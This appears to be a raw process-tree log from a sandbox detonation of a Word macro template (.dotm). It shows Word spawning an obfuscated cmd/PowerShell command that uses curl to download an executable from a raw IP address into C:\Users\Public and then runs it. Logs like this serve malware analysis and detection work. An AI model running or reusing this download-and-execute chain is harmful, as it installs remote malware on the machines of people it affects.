WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\o19wzg.dotm
2556cmd.exe cmd /c pow^ers^hell/W 01 c^u^rl htt^p://195.201.101.146/12341rgergg435g4tr.e^xe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
2692powershell.exe powershell /W 01 curl http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
2764curl.exe "C:\util\curl\curl.exe" http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
285243et5rgr6hty6h76tuyr6t.exe "C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe"
2976explorer.exe C:\Windows\Explorer.EXE
1452